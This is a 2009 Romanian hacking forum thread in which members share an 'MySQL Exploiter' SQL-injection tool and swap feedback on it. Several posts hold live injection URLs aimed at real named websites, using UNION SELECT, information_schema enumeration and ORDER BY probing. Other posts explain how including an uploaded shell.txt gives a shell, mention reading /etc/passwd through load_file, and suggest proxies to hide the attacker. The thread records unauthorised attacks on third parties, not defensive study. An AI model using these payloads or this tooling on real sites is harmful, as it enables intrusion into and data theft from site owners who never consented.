Fitty Posted July 26, 2009 Report Share Posted July 26, 2009 (edited) asdasdasdas Edited April 20, 2012 by Fitty Quote Link to comment Share on other sites More sharing options...
Vlachs Posted July 26, 2009 Report Share Posted July 26, 2009 si pentru mine nimic ? Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 26, 2009 Author Report Share Posted July 26, 2009 Scuza-ma Quote Link to comment Share on other sites More sharing options...
CyberWolf08 Posted July 26, 2009 Report Share Posted July 26, 2009 (edited) Incearca sa pui si un buton de pause/stop pentru ca are obiceiul sa se blocheze la anumite verificari si nu merge decat sa inchizi. Spre exemplu http://www.romanianwriters.ro/book.php?id=-1In rest e foarte tare Edited July 26, 2009 by CyberWolf08 Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 26, 2009 Author Report Share Posted July 26, 2009 (edited) Faza e ca nu i-am bagat convert...http://www.romanianwriters.ro/book.php?id=45%20union%20all%20select%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--ii bag acum LE : I have bagated convert functionen. Link updated Edited July 26, 2009 by Fitty Quote Link to comment Share on other sites More sharing options...
ZoOmLeSs Posted July 26, 2009 Report Share Posted July 26, 2009 Bv super tare Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 26, 2009 Author Report Share Posted July 26, 2009 (edited) Mersi daemien ps: mersi CyberWolf pt sugestie! Edited July 27, 2009 by Fitty Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 31, 2009 Author Report Share Posted July 31, 2009 Hai ca nu am avut ce face azi si am imbunatatit MySQL Exploiter-ul. Am adaugat niste chestii, vedeti voi.DOWNLOAD LINK : http://www.sharemobile.ro/download.php?id=373840Dedicatie pt blacksie )) Quote Link to comment Share on other sites More sharing options...
N-W-A Posted July 31, 2009 Report Share Posted July 31, 2009 bravo fifty, felicitari. Quote Link to comment Share on other sites More sharing options...
SirGod Posted July 31, 2009 Report Share Posted July 31, 2009 LFI exploiter sau load_file?Anyway,bravo. Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 31, 2009 Author Report Share Posted July 31, 2009 @SirGod: load_file, LFI via SQLimersi @ 007m, SirGod Quote Link to comment Share on other sites More sharing options...
SirGod Posted July 31, 2009 Report Share Posted July 31, 2009 load_file != LFI ,load_file iti arata continutul fisierului,LFI il include,si in orice caz,LFI prin SQLI nu se poate,si nici prin altceva,e pur si simplu LFI. Quote Link to comment Share on other sites More sharing options...
Fitty Posted July 31, 2009 Author Report Share Posted July 31, 2009 ei, atunci le confund eu. dar totusi, include continutul unui fisier in pagina tot lfi e bro, oricum i-ai zice Quote Link to comment Share on other sites More sharing options...
SirGod Posted July 31, 2009 Report Share Posted July 31, 2009 Nu INCLUDE.Nu e tot aia.Doar afiseaza.Uite un exemplu ca sa faci diferenta : <?$variabila=$_GET['variabila'];$variabila2=$_GET['variabila2'];include "$variabila";file_get_contents "$variabila2";?>Se intampla acelasi lucru?Daca avem :index.php?variabila=../shell.txtVa include continutul,si vei avea shell.Daca avem index.php?variabila2=../shell.txtIti va arata continutul txt-ului,nu va executa php.Eh,load_file() e asemanator cu file_get_contents() nu cu include(). Quote Link to comment Share on other sites More sharing options...
Oust Posted August 1, 2009 Report Share Posted August 1, 2009 imi da o eroare... Quote Link to comment Share on other sites More sharing options...
Fitty Posted August 1, 2009 Author Report Share Posted August 1, 2009 (edited) da, m-am prins, era vorba de functia include() a PHP-ului. Totusi, e o regula ca acest cuvant, inclusion (include) sa se refere strict la functia include() ? Eu nu cred.Despre "eroare": Am number of columns 100. wtf??Dar cum sa gaseasca numarul coloanelor cand el nu da eroare la order by <nr mare> ??http://www.liebermangallery.com/art.php?id=925%20order%20by%20119992--Esti sigur ca site-ul este vulnerabil? Daca da eroare la adaugarea apostrofului si nu merge sa introduci comenzi, degeaba... Edited August 1, 2009 by Fitty Quote Link to comment Share on other sites More sharing options...
SirGod Posted August 1, 2009 Report Share Posted August 1, 2009 da, m-am prins, era vorba de functia include() a PHP-ului. Totusi, e o regula ca acest cuvant, inclusion (include) sa se refere strict la functia include() ? Eu nu cred.Nu strict la include().Ci la :include()include_once()require()require_once()Restu doar citesc continutul,nu il includ => ca nu il poti utiliza,daca incluzi un fisier care are cod php in el va "executa" codul php,dar daca CITESTI(file_get_contents,etc) NU IL VA EXECUTA,doar va arata continutul fisierului. Quote Link to comment Share on other sites More sharing options...
Oust Posted August 1, 2009 Report Share Posted August 1, 2009 deci mie imi da eroarea de mai sus... la orice site chiar daca este vulnerabil , si nu mai uploada pe share mobile ca nu merge , doar cu proxy . Quote Link to comment Share on other sites More sharing options...
Fitty Posted August 1, 2009 Author Report Share Posted August 1, 2009 @Oust: taci ma. te-ai uitat prin sursa inainte sa faci afirmatiile astea prostesti?@SirGod: da, stiu ca nu are cum sa il execute (codul). eu ma refeream sa includa continutul vreunui fisier (apache logs, /etc/passwd/, mai stiu eu ce..) Quote Link to comment Share on other sites More sharing options...
SirGod Posted August 1, 2009 Report Share Posted August 1, 2009 @Oust: taci ma. te-ai uitat prin sursa inainte sa faci afirmatiile astea prostesti?@SirGod: da, stiu ca nu are cum sa il execute (codul). eu ma refeream sa includa continutul vreunui fisier (apache logs, /etc/passwd/, mai stiu eu ce..)Da,arata continutul din apache logs dar nu il executa,deci nu poti obtine remote command execution. Quote Link to comment Share on other sites More sharing options...
Oust Posted August 1, 2009 Report Share Posted August 1, 2009 deci vorbesc serios ... nu merge , are cineva unu mai bun ... Quote Link to comment Share on other sites More sharing options...
begood Posted August 1, 2009 Report Share Posted August 1, 2009 Fitty, imi place. Mai dezvolta-l Quote Link to comment Share on other sites More sharing options...
Oust Posted August 1, 2009 Report Share Posted August 1, 2009 (edited) bai fity gg imi merge primu ... 1.0.1 nu 1.1 1.0.1 E BUN !!! Fitty RulzzE bun si ultimu da merge numai la anumite situri uite .. http://www.rocknrollhighschool.nl/index.php?id=63&id_page=17&id_band=29+and+1=2+uNiON+aLl+sElEcT+1,2,3,4,5,6-- Edited August 1, 2009 by Oust Quote Link to comment Share on other sites More sharing options...
Guest vini4p Posted August 1, 2009 Report Share Posted August 1, 2009 Un proxy incorporat pe viitor oricum congratz ! Quote Link to comment Share on other sites More sharing options...
begood Posted August 1, 2009 Report Share Posted August 1, 2009 Un proxy incorporat pe viitor oricum congratz !+1. ( in case not, use freecap ) Quote Link to comment Share on other sites More sharing options...